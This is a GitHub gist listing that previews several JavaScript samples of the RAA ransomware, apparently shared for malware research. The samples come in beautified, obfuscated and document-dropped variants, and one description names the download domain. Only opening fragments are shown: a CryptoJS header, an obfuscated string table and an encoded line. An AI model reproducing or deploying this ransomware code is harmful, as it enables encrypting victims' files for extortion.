Skip to content

Instantly share code, notes, and snippets.

View Antelox's full-sized avatar

@Antelox Antelox

View GitHub Profile
@Antelox
Antelox / RAA.js
Created July 12, 2016 15:16
RAA ransomware downloaded from datagiverd\.com
var CryptoJS = CryptoJS || function(u, p) {
var d = {},
l = d.lib = {},
s = function() {},
t = l.Base = {
extend: function(a) {
s.prototype = this;
var c = new s;
a && c.mixIn(a);
c.hasOwnProperty("init") || (c.init = function() {
@Antelox
Antelox / RAA.js
Created September 16, 2016 09:46
RAA ransomware - Now payload code heavily obfuscated
var _0xc751 = ["length", "digits", "boolean", "slice", "isNeg", "charAt", "-", "0", "substr", "abs", "", "1", "2", "3", "4", "5", "6", "7", "8", "9", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "min", "charCodeAt", "max", "fromCharCode", " ", "join", "floor", "ceil", "modulus", "mu", "bkplus1", "modulo", "multiplyMod", "powMod", "NoPadding", "PKCS1Padding", "RawEncoding", "NumericEncoding", "number", "chunkSize", "radix", "barrett", "string", "random", "split", "substring", "lib", "Base", "prototype", "mixIn", "init", "hasOwnProperty", "apply", "$super", "extend", "toString", "WordArray", "words", "sigBytes", "stringify", "clamp", "push", "call", "clone", "enc", "Hex", "Latin1", "Utf8", "Malformed UTF-8 data", "parse", "BufferedBlockAlgorithm", "_data", "_nDataBytes", "concat", "blockSize", "_minBufferSize", "splice", "Hasher", "cfg", "reset", "finalize", "HMAC", "algo", "Base64", "_map", "indexOf", "create", "ABCDEFGHIJKLMN
@Antelox
Antelox / RAA_Ransom_beautified.js
Created June 14, 2016 13:09
Beautified Javascript code of the RAA Ransomware
var CryptoJS = CryptoJS || function(u, p) {
var d = {},
l = d.lib = {},
s = function() {},
t = l.Base = {
extend: function(a) {
s.prototype = this;
var c = new s;
a && c.mixIn(a);
c.hasOwnProperty("init") || (c.init = function() {
@Antelox
Antelox / s.js
Created June 20, 2016 10:46
RAA Ransomware javascript code beautified
var CryptoJS = CryptoJS || function(u, p) {
var d = {},
l = d.lib = {},
s = function() {},
t = l.Base = {
extend: function(a) {
s.prototype = this;
var c = new s;
a && c.mixIn(a);
c.hasOwnProperty("init") || (c.init = function() {
@Antelox
Antelox / RAA_ransomware_new_variant.js
Created August 29, 2016 14:05
New RAA ransomware variant - code dropped by a .doc file
////1pelDZyydsTIR5Zri3YDm3hG5qDWSU0SMOml2APXT0G3P6AlpXW9crsWOlRhh8YXNSgCuSx1Zjzdgdom63F12MhHMkrdgGrdSupSnzqVGJpa5T1j1PDr4GQ52hbrBXEO2yO5MJw2yKhzKtBRVmH2XgU9eyRAdXfitQ7ClpUDz5c39YmHNDbqp6O5g0LMTlHOoISDSwxqnKSrqctz5QyK0fch83I7kym6PftqKPE2N4rWtIsjjcHQvf1C8CNCshPbHhfJ9yyRulOHyQKRDoGHtGIXhd3pp6x8K6WqADLhjj3E9TMMqEXrKSk2mBjMMyBANayM1frIWms1Hf1vx3noqPOJZ7bEd5MK4mXWrBYWc5ysmR2kzOKZWsBM35h44iAavITskbRgpPbvY8l1dRphJxYznVA8MVhij3dOJX4iFQimEvP0QyIVz4CPy0s2sQtz8sWAeZYsTOaCXwWyM6NrzG7AjDGWBA66WMlNPYbj35kH4nj8z8nKneuDfoHntevO8tebGI3T7uDeFCd3ZtBYOAFKemqomrJJO27ASNPPJIu0Vt4Cb60n4ZjmtwHy0st3X7jyoFqiwOJyhrekX9ooPdt9EiF7rAaZV4BQlhIPUuS4uiKhmzpyZlRUe9gYPBRgyTrgoNvfBJ44ITW8vQaanbri7DEajAmdnul88ghLzB4SNKFqDV1WB67GaIj989QiYcY5VvOchvCJPzZ5IJg5ijouN03foKODTD0nQdfATbxED1QlEpE2V0HwdABJaYkfTtchUEWHR7rmxXUbfEB2ICKY96TK6CbCbeRp4quRaborW9RqOIwDILqUSBHn3AYLX0IbATj415mdqAP21B217Uwq5YkQpEFuZh1kbKrYKNpTgwl30HbI6BAK5EqqHZBBdrEaLSfSGEDIYfxTqW8fmA7XtHjusZsPgM7TDcd4ghr7vEs6cqYAiV7cKSGTyuBTKJZXiOEAhq0ogNDsfoL0QeMCtqrBOoqoe1beFZ8z7cG8pDGpcfAmj64UNzXk